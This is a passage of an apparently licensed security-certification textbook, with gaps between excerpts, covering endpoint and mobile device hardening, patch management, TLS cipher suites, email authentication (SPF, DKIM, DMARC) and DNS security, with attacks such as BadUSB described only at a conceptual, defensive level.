barriers between devices so that a threat that infiltrates one device cannot easily
spread to others. Device isolation restricts network traffic between devices reducing
the potential attack surface. This approach is particularly useful for threats like
worms or ransomware which often aim to propagate through networks quickly.
Device isolation also limits breach impacts by ensuring that compromised devices
cannot access the entire network.
Disk Encryption
Full disk encryption (FDE) means that the entire contents of the drive (or volume),
including system files and folders, are encrypted. OS ACL-based security measures
are quite simple to circumvent if an adversary can attach the drive to a different
host OS. Drive encryption allays this security concern by making the contents of
the drive accessible only in combination with the correct encryption key. Disk
encryption can be applied to both hard disk drives (HDDs) and solid state drives
(SSDs).
FDE requires the secure storage of the key used to encrypt the drive contents.
Normally, this is stored in a Trusted Platform Module (TPM). The TPM chip has a secure
storage area that a disk encryption program, such as Windows BitLocker, to which
it can write its keys. It is also possible to use a removable USB drive (if USB is a boot
device option). As part of the setup process, you create a recovery password or key.
This can be used if the disk is moved to another computer or the TPM is damaged.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Activating BitLocker drive encryption. (Screenshot used with permission from Microsoft.)
One of the drawbacks of FDE is that, because the OS performs the cryptographic
operations, performance is reduced. This issue is mitigated by self-encrypting
drives (SED), where the cryptographic operations are performed by the drive
controller. The SED uses a symmetric data/media encryption key (DEK/MEK) for bulk
encryption and stores the DEK securely by encrypting it with an asymmetric key pair
called either the authentication key (AK) or Key Encryption Key (KEK). The use of
the AK is authenticated by the user password. This means that the user password
can be changed without having to decrypt and re-encrypt the drive. Early types of
SEDs used proprietary mechanisms, but many vendors now develop to the Opal
Storage Specification (nvmexpress.org/wp-content/uploads/TCGandNVMe_Joint_
White_Paper-TCG_Storage_Opal_and_NVMe_FINAL.pdf), developed by the Trusted
Computing Group (TCG).
Device Description
Laptops, Desktops, Mobile Full disk encryption ensures that sensitive
Devices, and Servers data is protected even if the storage device is
removed from the device or accessed directly
using other methods. For virtual machines, FDE
prevents direct access to data stored in the
virtual machine’s disk file.
IoT Devices Internet of things (IoT) devices, such as
smart home devices, wearables, and
industrial sensors, often collect and transmit
sensitive data. Full disk encryption prevents
unauthorized access to this data if the devices
are compromised.
External Hard Drives and USB Portable storage devices are prone to loss
Flash Drives, and External or theft. Full disk encryption ensures that
Media the data stored on these devices remain
protected, making it significantly harder for
unauthorized individuals to access or retrieve
the information.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Patch Management
No operating system, software application, or firmware implementation is free from
vulnerabilities. As soon as a vulnerability is identified, vendors will try to correct it.
At the same time, attackers will try to exploit it. Automated vulnerability scanners
can be effective at discovering missing patches for the operating system plus a
wide range of third-party software apps and devices/firmware. Scanning is only
useful if effective procedures are in place to apply the missing patches.
In residential and small networks, hosts are typically configured to auto-update,
meaning that they check for and install patches automatically. The major OS and
applications software products are well supported in terms of vendor-supplied fixes
for security issues. In Windows, this process is handled by Windows Update, while in
Linux it can be configured via yum-cron or apt unattended-upgrades,
depending on the package manager used by the distribution.
Enterprise networks need to be cautious about this sort of automated deployment,
however, as a patch incompatible with an application or workflow can cause
availability issues. In rare cases, such as the infamous SolarWinds hack (npr.
org/2021/04/16/985439655/a-worst-nightmare-cyberattack-the-untold-story-of-
the-solarwinds-hack?t=1631031433646), update repositories can be infected with
malware that can then be spread via automated updates.
There can also be performance and management issues when multiple applications
run update clients on the same host. For example, as well as the OS updater, there
is likely also a security software update, browser updater, Java updater, OEM driver
updater, and so on. These issues can be mitigated by deploying an enterprise patch
management suite. Some suites, such as Microsoft’s System Center Configuration
Manager (SCCM)/Endpoint Manager (docs.microsoft.com/en-us/mem/configmgr),
are vendor specific while others are designed to support third-party applications
and multiple OSes.
Testing patches before deploying them into the production environment is crucial
for maintaining the stability and security of software. By conducting thorough
testing, organizations can identify potential issues or conflicts arising from the
patch, ensuring that it does not introduce new vulnerabilities or disrupt critical
operations. Testing helps mitigate the risk of unintended consequences and
facilitates a more controlled deployment process, ultimately safeguarding the
integrity and reliability of the environment. Testing is typically performed in testing
environments built to mirror the production environment as much as appropriate.
Also, it can also be difficult to schedule patch operations, especially if applying
the patch is an availability risk to a critical system. If vulnerability assessments
continually highlight issues with missing patches, patch management procedures
should be upgraded. If the problem affects certain hosts only, it could indicate a
compromise that should be investigated more closely.
Patch management can be difficult for legacy systems, proprietary systems, and
systems from vendors without robust security management plans, such as some
types of Internet of Things devices. These systems will need compensating controls
or some other form of risk mitigation if patches are not readily available.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The term “EDR” was coined by Gartner security researcher Anton Chuvakin, and
Gartner produces annual “Magic Quadrant” reports for both EPP (gartner.com/en/
documents/3848470) and EDR functionality within security suites (https://www.
gartner.com/en/documents/3894086).
Where earlier endpoint protection suites report to an on-premises management
server, next-generation endpoint agents are more likely to be managed from a
cloud portal and use artificial intelligence (AI) and machine learning to perform user
and entity behavior analysis. These analysis resources would be part of the security
service provider’s offering.
Note that managed detection and response (MDR) is a class of hosted security service
(digitalguardian.com/blog/what-managed-detection-and-response-definition-benefits-
how-choose-vendor-and-more).
EDR focuses on protecting endpoint devices like computers, laptops, and mobile
devices by collecting and analyzing data from endpoints to detect, investigate,
and respond to advanced threats that may bypass traditional security measures.
EDR tools provide real-time monitoring and collection of endpoint data, allowing
for fast response and investigation capabilities. EDR software is an important tool
which detects and responds to advanced persistent threats and ransomware, and it
provides valuable forensic insight after a breach. Extended detection and response
(XDR) expands on EDR by providing broader visibility and response capabilities by
extending protection beyond endpoints by incorporating data from the network,
cloud platforms, email gateway, firewall, and other essential infrastructure
components. Using a broader scope, XDR provides a comprehensive view of
information technology resources to more effectively identify threats and enable
faster responses.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Endpoint Configuration
If endpoint security is breached, there are several classes of vector to consider for
mitigation:
• Social Engineering—if the malware was executed by a user, use security
education and awareness to reduce the risk of future attacks succeeding. Review
permissions to see if the account could be operated with a lower privilege level.
• Lack of Security Controls—if the attack could have been prevented by endpoint
protection/A-V, host firewall, content filtering, DLP, or MDM, investigate the
possibility of deploying them to the endpoint. If this is not practical, isolate the
system from being exploited by the same vector.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Access Control
Access control refers to regulating and managing the permissions granted to
individuals, software, systems, and networks to access resources or information.
Access controls ensure that only authorized entities can perform specific actions or
access certain data, while unauthorized entities are denied access. Access control
concepts apply to networks, physical access, data, applications, and the cloud.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
While ACLs offer flexibility and control, managing complex access control policies
with numerous ACL entries can become challenging. Complexity increases the
risk of misconfigurations. Therefore, proper planning, periodic reviews, and best
practice configurations are essential when implementing and maintaining ACLs.
Configuring an access control entry for a folder. (Screenshot used with permission from Microsoft.)
• Write (w)—the ability to save changes to a file, or create, rename, and delete
files in a directory (also requires execute).
• Execute (x)—the ability to run a script, program, or other software file, or the
ability to access a directory, execute a file from that directory, or perform a task
on that directory, such as file search.
These permissions can be applied in the context of the owner user (u), a group
account (g), and all other users/world (o). A permission string lists the permissions
granted in each of these contexts:
d rwx r-x r-x home
The string above shows that for the directory (d), the owner has read, write, and
execute permissions, while the group context and other users have read and
execute permissions.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• A block list (or deny list) generally allows execution, but explicitly prohibits listed
processes.
The contents of allow lists and block lists needs to be updated in response to
incidents and ongoing threat hunting and monitoring.
Threat hunting may also provoke a strategic change. For example, if you rely
principally on explicit denies, but your systems are subject to numerous intrusions,
you will have to consider adopting a “least privileges” model and using a deny-
unless-listed approach. This sort of change can be highly disruptive, however, so it
must be preceded by a risk assessment and business impact analysis.
Execution control can also be tricky to configure effectively, with many
opportunities for threat actors to evade the controls. Detailed analysis of the attack
might show the need for changes to the existing mechanism or the use of a more
robust system.
Monitoring
Monitoring plays a vital role in endpoint hardening, helping to enforce and maintain
the security measures put in place during the hardening process. Once devices are
hardened, monitoring helps to ensure these conditions remain in place.
Security analysts can detect changes that weaken the hardened configuration
through continuous monitoring. For instance, if a previously disabled port is
detected as open or a service that was disabled is changed to enabled, monitoring
tools can alert analysts of the change—which may be indicative of a breach.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Additionally, monitoring can provide valuable data for compliance and auditing
purposes. Regular reports on the status of endpoint devices can verify that
hardening baselines have been effectively deployed and maintained, supporting
compliance with various regulations and industry standards.
Configuration Enforcement
Configuration enforcement describes methods used to ensure that systems
and devices within an organization’s network adhere to mandatory security
configurations. Configuration enforcement generally depends upon a few important
capabilities.
• Standardized Configuration Baselines are defined by organizations like NIST,
CIS, or the organization itself and used as the benchmark for how systems and
devices should be configured.
Group Policy
Group Policy is a feature of the Microsoft Windows operating system and provides
centralized management and configuration of operating systems, applications, and
user settings in an Active Directory environment. Group Policies enforce security
settings, such as those mandated in a baseline, by applying consistent settings
across all systems linked to specific Group Policies. In general terms, Group Polices
are linked to containers called Organizational Units (OUs) that normally contain
user and computer objects. The Group Policies linked to the OU apply to all objects
contained within it.
Examples of common Group Policy settings include password policies, user rights,
Windows Firewall settings, system update settings, software installation restrictions,
and many others. Applying settings centrally using Group Policy reduces potential
issues related to misconfigurations or inconsistent settings.
SELinux
SELinux is a security feature of the Linux kernel that supports access control
security policies, including mandatory access controls (MAC). SELinux allows
more granular permission control over every process and system object within
an operating system, strictly limiting the resources a process can access and what
operations it can perform. SELinux operates on the principle that if a process
or user does not need resource access to operate, it will be blocked to isolate
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
applications better, restrict system and file access, and prevent malicious or flawed
programs from causing harm to the system. SELinux capabilities are also available
on the Android operating system https://source.android.com/docs/security/
features/selinux. Due to the significant architectural differences between Linux
and Android, SELinux capability on Android is enabled using SEAndroid to provide
similar functionality but using a separately maintained codebase.
Hardening Techniques
Different hardening approaches are required to protect endpoints in response to
a wide variety of constantly evolving cybersecurity threats. These threats require a
layered and comprehensive defense strategy addressing vulnerabilities at multiple
levels, from physical access to network protocols, operating system configurations,
and user behaviors.
Protecting Ports
Physical device port hardening involves restricting the physical interfaces on a
device that can be used to connect to it, thereby reducing potential avenues of
physical attack. One common technique is disabling unnecessary physical ports
such as USB, HDMI, or serial ports when they serve no business purpose. Doing so
can help prevent unauthorized data transfer, installation of malicious software, or
direct access to a system.
Port control software provides additional protection by allowing only authorized
devices to connect via physical ports based on device identifiers. For instance, it
might block all USB mass storage devices except company-approved ones.
Security analysts can leverage settings in device firmware or UEFI/BIOS for port
hardening to disable physical ports or to require a password before a device can
boot from a nonstandard source like a USB drive. For devices such as tablets and
laptops that depend upon wireless protocols, disabling the automatic network
connection feature can prevent the device from using potentially insecure or rogue
networks.
As revealed by researcher Karsten Nohl in his BadUSB paper (https://assets.
website-files.com/6098eeb4f4b0288367fbb639/62bc77c194c4e0fe8fc5e4b5_
SRLabs-BadUSB-BlackHat-v1.pdf), exploiting the firmware of external storage
devices, such as USB flash drives and even standard-looking device charging cables,
presents adversaries with an incredible toolkit. The firmware can be reprogrammed
to make the device look like another device class, such as a keyboard. In this case, it
could then be used to inject a series of keystrokes upon an attachment or work as
a keylogger. The device could also be programmed to act like a network device and
corrupt name resolution, redirecting the user to malicious websites.
Another example is the O.MG cable (theverge.com/2019/8/15/20807854/apple-
mac-lightning-cable-hack-mike-grover-mg-omg-cables-defcon-cybersecurity), which
packs enough processing capability into an ordinary-looking USB-Lightning cable to
run an access point and keylogger.
A modified device may have visual clues that distinguish it from a mass
manufactured thumb drive or cable, but these may be difficult to spot. You should
warn users of the risks and repeat the advice to never attach devices of unknown
provenance to their computers and smartphones. If you suspect a device as an
attack vector, observe a sandboxed lab system (sometimes referred to as a sheep
dip) closely when attaching the device. Look for command prompt windows or
processes, such as the command interpreter starting and changes to the registry or
other system files.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Not all attacks have to be so esoteric. USB sticks infected with ordinary malware are
still incredibly prolific infection vectors. Hosts should always be configured to prevent
autorun when USB devices are attached. USB ports can be blocked altogether using
most types of host intrusion detection systems (HIDS).
Encryption Techniques
Endpoint encryption is critical to protecting sensitive data, especially in an
enterprise setting. Several different approaches are required to protect data on
endpoints. Some important ones include the following:
• Full Disk Encryption (FDE) encrypts the entire hard drive of a device. It ensures
that all data, including the operating system and user files, are protected even
while the operating system is not running. Tools like BitLocker for Windows and
FileVault for macOS provide full disk encryption capabilities.
• Removable Media Encryption ensures that data remains protected even when
physically removed from devices such as SDCards or USB mass storage devices.
Many FDE tools also include options for encrypting removable media.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Regular firmware updates from the manufacturer are crucial to patching any known
vulnerabilities in older firmware versions, fortifying the printer’s security. If possible,
utilize encrypted network protocols like HTTPS for web interfaces and SNMPv3 for
device management to protect data, including passwords, through unencrypted
protocols. Access to the printer should be based on the principle of least privilege,
granting only the access necessary for specific tasks.
Decommissioning
Decommissioning processes play a vital role in supporting security within an
organization. When a device is no longer needed, it often contains residual data,
potentially sensitive information, and system configurations that could be exploited.
A thorough and systematic decommissioning process ensures that all data is
securely erased or overwritten to reduce the risk of exposure. Decommissioning
also involves resetting devices to their factory settings and eliminating any
residual settings. Updating inventory records during decommissioning is also
important to maintain an accurate account of active assets and support compliance
requirements that mandate accurate asset tracking and secure disposal.
Decommissioning hardware securely is essential as they often store sensitive data
on internal drives and retain potentially exploitable configuration and user data.
Data sanitization is a critically important step in the decommissioning process and
describes how all data on the device or removable media is securely erased to
ensure no recoverable data remains.
Additionally, the device should be reset to its factory settings via a management
console or other utility, eliminating any residual system configurations or settings
that could pose a security risk. Disposing of physical equipment often warrants the
physical destruction of some internal components like memory modules, hard disk
drives (HDD), solid state disks (SSD), M.2, or other storage modules, especially if
they have stored sensitive data. In some scenarios, a professional disposal service
specializing in certified secure disposal of electronic components may be the most
appropriate choice.
The final step in the decommissioning process involves documentation and
updating inventory records to reflect that the device has been decommissioned.
This step ensures an accurate asset record and compliance with security standards
and regulations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Hardening ICS/SCADA
For ICS/SCADA systems, hardening involves strict network segmentation to isolate
these systems from the wider network and robust authentication and authorization
processes to limit system access strictly. ICS/SCADA is often used to control physical
operations.
Ensuring protection from cyber and physical threats is even more crucial because
breaches can result in environmental disasters, power/gas/water utility failure,
and loss of life. A unique control often used to protect ICS/SCADA is unidirectional
gateways (or data diodes), which ensure that data only flows outward from these
systems, protecting them from inbound attacks.
More information regarding the Common Criteria can be obtained from https://www.
commoncriteriaportal.org.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Endpoint Security
3
3. Why are OS-enforced file access controls not sufficient in the event of
3.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 10B
Mobile Device Hardening
4
Deployment Models
Mobile device deployment models are critical in defining how an organization uses,
manages, and secures devices. The chosen deployment model impacts everything
from the user experience to the organization’s level of control over the device.
• Bring your own device (BYOD)—means the mobile device is owned by the
employee. The device must comply with established requirements developed
by the organization (such as OS version and device capabilities), and the
employee must agree to having corporate apps installed and acknowledge the
organization’s right to perform audit and compliance checks within the limits
of legal and regulatory rules. This model is popular with employees but poses
significant risk for security operations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Choose your own device (CYOD)—is similar to COPE except the employee is
given a choice of devices to select from a preestablished list.
Models such as Bring Your Own Device (BYOD), Choose Your Own Device (CYOD),
and Corporate Owned, Personally Enabled (COPE) provide varying degrees of
control and flexibility to both the organization and the employee. For example,
BYOD can offer equipment cost savings to the organization and flexibility for
employees, but it also introduces security challenges caused by mixing personal
and professional data. In contrast, COPE gives the organization greater control
over the device, thereby improving security, but it requires more spending on
equipment.
Selecting the appropriate mobile device deployment model is vital to effectively
balance productivity, user satisfaction, cost efficiency, and security in the workplace.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Email data and any apps using the “Data Protection” option are subject to a
second round of encryption using a key derived from and protected by the user’s
credential. This provides security for data in the event that the device is stolen.
Not all user data is encrypted using the “Data Protection” option; contacts, SMS
messages, and pictures are not, for example.
Location Services
Geolocation is the use of network attributes to identify (or estimate) the physical
position of a device. The device uses location services to determine its current
position. Location services can make use of two systems:
• Global Positioning System (GPS)—a means of determining the device’s latitude
and longitude based on information received from satellites via a GPS sensor.
Location services is available to any app where the user has granted the app
permission to use it.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Restricting device permissions such as camera and screen capture using Intune.
(Screenshot used with permission from Microsoft.)
GPS Tagging
GPS tagging is the process of adding geographical identification metadata, such
as the latitude and longitude where the device was located at the time, to media
such as photographs, SMS messages, video, and so on. It allows the app to place
the media at specific latitude and longitude coordinates. GPS tagging is highly
sensitive personal information and potentially confidential organizational data.
GPS tagged pictures uploaded to social media could be used to track a person’s
movements and location. For example, a Russian soldier revealed troop positions
by uploading GPS tagged selfies to Instagram (arstechnica.com/tech-policy/2014/08/
opposite-of-opsec-russian-soldier-posts-selfies-from-inside-ukraine).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Locking down Android connectivity methods with Intune—note that most settings can be applied
only to Samsung KNOX-capable devices. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Pairing a computer with a smartphone. (Screenshot used with permission from Microsoft.)
It is also the case that using a control center toggle may not actually turn off the
Bluetooth radio on a mobile device. If there is any doubt about patch status or
exposure to vulnerabilities, Bluetooth should be fully disabled through device
settings.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Feature Description
Pairing and Authentication During pairing, devices exchange
cryptographic keys to authenticate
each other’s identity and establish
a secure communication channel.
Pairing is accomplished using various
methods, such as numeric comparison,
passkey entry, or out-of-band (OOB)
authentication.
Bluetooth Permissions Bluetooth generally requires user
consent or permission to connect and
access specific services. Users can
control which devices connect to their
Bluetooth-enabled devices and manage
permissions to prevent unauthorized
access.
Encryption Bluetooth employs encryption algorithms
to protect data transmitted between
devices. Once pairing is complete,
Bluetooth devices use a shared secret
key to encrypt data packets.
Bluetooth Secure Connections (BSC) Introduced in Bluetooth 4.0, BSC
offers increased resistance against
eavesdropping, on-path attacks, and
unauthorized access.
Bluetooth Low Energy (BLE) Privacy BLE is a power-efficient version of
Bluetooth that uses randomly generated
device addresses that periodically change
to prevent tracking and unauthorized
identification of BLE devices.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Skimming a credit or bank card will give the attacker the long card number and
expiration date. Completing fraudulent transactions directly via NFC is much more
difficult as the attacker would have to use a valid merchant account and fraudulent
transactions related to that account would be detected very quickly.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Mobile Device Hardening
5
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 10
Summary
5
You should be able to apply host hardening policies and technologies and to assess
risks from third-party supply chains and embedded/IoT systems.
• Create a management plan for any IoT devices used in the workplace.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Secure protocol and application development concepts are essential pillars of
robust cybersecurity. Protocols such as HTTPS, SMTPS, and SFTP provide encrypted
communication channels, ensuring data confidentiality and integrity during
transmission. Similarly, email security protocols like SPF, DKIM, and DMARC work
to authenticate sender identities and safeguard against phishing and spam. Secure
coding practices encompass input validation to thwart attacks like SQL injection or
XSS, enforcing the principle of least privilege to minimize exposure during a breach,
implementing secure session management, and consistently updating and patching
software components. Developers must also design software that generates
structured, secure logs to support effective monitoring and alerting capabilities.
Lesson Objectives
In this lesson, you will do the following:
• Understand secure protocol concepts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 11A
Application Protocol Security Baselines
2
Secure Protocols
Many of the protocols used on computer networks today were developed many
decades ago when functionality was paramount, trustworthiness was assumed
instead of earned, and network security was less of an issue than it is today. Many
early-era protocols have secure alternatives or can be configured to incorporate
security features, whereas others must simply be avoided.
Insecure protocols, such as HTTP and Telnet, transmit data in clear text format,
meaning anyone accessing the data packets can read any intercepted data sent over
a network. In contrast, secure protocols, like HTTPS and SSH (as alternatives to HTTP
and TELNET), use encryption to protect transmitted data and improve security.
Using HTTPS is crucial for protecting sensitive user information, such as login
credentials and data entered into form fields, from being stolen when using
webpages. System and network engineers must use SSH instead of Telnet when
connecting to servers and equipment to ensure their login information, data, and
commands are encrypted.
Unfortunately, secure protocols are typically more complex to implement,
manage, and maintain when compared to their insecure counterparts and so
are often avoided or disabled. For example, HTTPS requires obtaining a valid
SSL/TLS certificate from a certificate authority (CA). After obtaining the appropriate
certificate, it must be correctly installed and configured on a server, which requires
more skill, time, and planning than simply enabling and using HTTP.
Secure protocols leverage encryption and decryption which require the correct
handling of cryptographic keys, including processes regarding how they are
created, stored, distributed, and revoked. Additionally, after properly obtaining
and configuring the certificate, it must be managed effectively to ensure it remains
trustworthy and does not expire.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
HTTPS operates over port 443 by default. HTTPS operation is indicated by using
https:// for the URL and by a padlock icon shown in the browser.
It is also possible to install a certificate on the client so that the server can trust the
client. This is not often used on the web but is a feature of VPNs and enterprise
networks that require mutual authentication.
SSL/TLS Versions
While the acronym SSL is still used, the Transport Layer Security versions are the
only ones that are safe to use. A server can provide support for legacy clients, but
obviously this is less secure. For example, a TLS 1.2 server could be configured to
allow clients to downgrade to TLS 1.1 or 1.0 or even SSL 3.0 if they do not support
TLS 1.2.
A downgrade attack is where an on-path attack tries to force the use of a weak cipher
suite and SSL/TLS version.
TLS version 1.3 was approved in 2018. One of the main features of TLS 1.3 is the
removal of the ability to perform downgrade attacks by preventing the use of
unsecure features and algorithms from previous versions. There are also changes
to the handshake protocol to reduce the number of messages and speed up
connections.
Cipher Suites
A cipher suite is the algorithms supported by both the client and server to perform
the different encryption and hashing operations required by the protocol. Prior to
TLS 1.3, a cipher suite would be written in the following form:
ECDHE-RSA-AES128-GCM-SHA256
This means that the server can use Elliptic Curve Diffie-Hellman Ephemeral mode
for session key agreement, RSA signatures, 128-bit AES-GCM (Galois Counter Mode)
for symmetric bulk encryption, and 256-bit SHA for HMAC functions. Suites the
server prefers are listed earlier in its supported cipher list.
TLS 1.3 uses simplified and shortened suites. A typical TLS 1.3 cipher suite appears
as follows:
TLS_AES_256_GCM_SHA384
Only ephemeral key agreement is supported in 1.3 and the signature type is
supplied in the certificate, so the cipher suite only lists the bulk encryption key
strength and mode of operation (AES_256_GCM), plus the cryptographic hash
algorithm (SHA384) used within the new hash key derivation function (HKDF). HKDF
is the mechanism by which the shared secret established by D-H key agreement is
used to derive symmetric session keys.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Viewing the TLS handshake in a Wireshark packet capture. Note that the connection is using
TLS 1.3 and one of the shortened cipher suites (TLS_AES_128_GCM_SHA256).
• Simple Bind—means the client must supply its distinguished name (DN) and
password, but these are passed as plaintext.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
If SNMP is not used, it should be disabled. When running SNMP the following
includes some important guidlines:
• SNMP community names are sent in plaintext and so should not be transmitted
over the network if there is any risk that they could be intercepted.
• Use difficult-to-guess community names; never leave the community name blank
or set to the default.
• Use access control lists to restrict management operations to known hosts (that
is, restrict to one or two host IP addresses).
• Use SNMP v3 when possible, and disable older versions of SNMP. SNMP
v3 supports encryption and strong user-based authentication. Instead of
community names, the agents are configured with a list of usernames and
access permissions. When authentication is required, SNMP messages are
signed with a hash of the user’s passphrase. The agent can verify the signature
and authenticate the user using its own record of the passphrase.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
You should check that users do not install unauthorized servers on their PCs (a rogue
server). For example, a version of IIS that includes HTTP, FTP, and SMTP servers is
shipped with client versions of Windows, though it is not installed by default.
FTPS is tricky to configure when there are firewalls between the client and server.
Consequently, FTPES is usually the preferred method.
Email Services
Email services use two types of protocols:
• The Simple Mail Transfer Protocol (SMTP) specifies how mail is sent from one
system to another.
• A mailbox protocol stores messages for users and allows them to download
them to client computers or manage them on the server.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The STARTTLS method is generally more widely implemented than SMTPS. Typical
SMTP configurations use the following ports and secure services:
• Port 25—is used for message relay (between SMTP servers or message transfer
agents [MTA]). If security is required and supported by both servers, the
STARTTLS command can be used to set up the secure connection.
• Port 587—is used by mail clients (message submission agents [MSA]) to submit
messages for delivery by an SMTP server. Servers configured to support port 587
should use STARTTLS and require authentication before message submission.
• Port 465—is used by some providers and mail clients for message submission
over implicit TLS (SMTPS), though this usage is now deprecated by standards
documentation.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Email Security
Three technologies have emerged as essential for verifying the authenticity
of emails and preventing phishing and spam. Sender Policy Framework (SPF),
DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication,
Reporting & Conformance (DMARC).
Sender Policy Framework (SPF) is an email authentication method that helps
detect and prevent sender address forgery, which is commonly used in phishing
and spam emails. SPF works by verifying the sender’s IP address against a list of
authorized sending IP addresses published in the DNS TXT records of the email
sender’s domain. When an email is received, the receiving mail server checks the
SPF record of the sender’s domain to verify the email originated from one of the
pre-authorized systems.
Displaying the TXT records for microsoft.com using the dig tool. (Screenshot used with
permission from Microsoft.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The combined use of SPF, DKIM, and DMARC significantly enhances email security by
making it much more difficult for attackers to impersonate trusted domains, which is
one of the most common tactics used in phishing and spam attacks. These protocols
are essential tools in the fight against email-based threats because they provide
essential mechanisms that help verify the authenticity of emails, maintain the integrity
of the email content, and ensure the safe delivery of electronic communication.
Email Gateway
An email gateway is the control point for all incoming and outgoing email traffic.
It acts as a gatekeeper, scrutinizing all emails to remove potential threats before
they reach inboxes. Email gateways utilize several security measures, including
anti-spam filters, antivirus scanners, and sophisticated threat detection algorithms
to identify phishing attempts, malicious URLs, and harmful attachments. Email
gateways leverage DMARC, SPF, and DKIM to automate the authentication and
validation of email senders, reducing the chances that spoofed or impersonated
emails will be delivered.
Email gateways also play a critical role in policy enforcement by allowing
organizations to create rules related to email content and attachments based on
established policies or regulatory compliance requirements. Attachment blocking,
content filtering, and data loss prevention are common tasks email gateways handle.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
DNS Filtering
Domain Name System (DNS) filtering is a technique that blocks or allows access to
specific websites by controlling the resolution of domain names into IP addresses. It
operates on the principle that for a device to access a website, it must first resolve
its domain name into its associated IP address, which is a process managed by DNS.
When a request is made to resolve a website URI, the DNS filter checks the request
against a database of domain names. If the domain is found to be associated with
malicious activities or is on an unapproved list for any reason, the filter blocks the
request, preventing access to the potentially harmful website.
DNS filtering is highly effective for many reasons. A few are listed below:
• It provides a proactive defense mechanism, blocking access to known phishing
sites, malware distribution sites, and other malicious online destinations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• It can protect all devices connected to a network, including IoT devices, providing
an extra layer of security.
While DNS filtering is highly effective, it must be combined with other security
measures for comprehensive protection.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
DNS Security
DNS is a critical service that should be configured to be fault tolerant. DoS attacks
are hard to perform against the servers that perform Internet name resolution,
but if an attacker can target the DNS server on a private network, it is possible to
seriously disrupt the operation of that network.
To ensure DNS security on a private network, local DNS servers should only accept
recursive queries from local hosts (preferably authenticated local hosts) and not
from the Internet. You also need to implement access control measures on the
server to prevent a malicious user from altering records manually. Similarly, clients
should be restricted to using authorized resolvers to perform name resolution.
Attacks on DNS may also target the server application and/or configuration. Many
DNS services run on BIND (Berkley Internet Name Domain), distributed by the
Internet Systems Consortium (isc.org). There are known vulnerabilities in many
versions of the BIND server, so it is critical to patch the server to the latest version.
The same general advice applies to other DNS server software, such as Microsoft’s.
Obtain and check security announcements and then test and apply critical and
security-related patches and upgrades.
DNS footprinting means obtaining information about a private network by using
its DNS server to perform a zone transfer (all the records in a domain) to a rogue
DNS or simply by querying the DNS service, using a tool such as nslookup or
dig. To prevent this, you can apply an access control list to prevent zone transfers
to unauthorized hosts or domains, to prevent an external server from obtaining
information about the private network architecture.
DNS Security Extensions (DNSSEC) help to mitigate against spoofing and poisoning
attacks by providing a validation process for DNS responses. With DNSSEC enabled,
the authoritative server for the zone creates a “package” of resource records (called
an RRset) signed with a private key (the Zone Signing Key). When another server
requests a secure record exchange, the authoritative server returns the package
along with its public key, which can be used to verify the signature.
The public Zone Signing Key is itself signed with a separate Key Signing Key.
Separate keys are used so that if there is some sort of compromise of the Zone
Signing Key, the domain can continue to operate securely by revoking the
compromised key and issuing a new one.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Windows Server DNS services with DNSSEC enabled. (Screenshot used with permission
from Microsoft.)
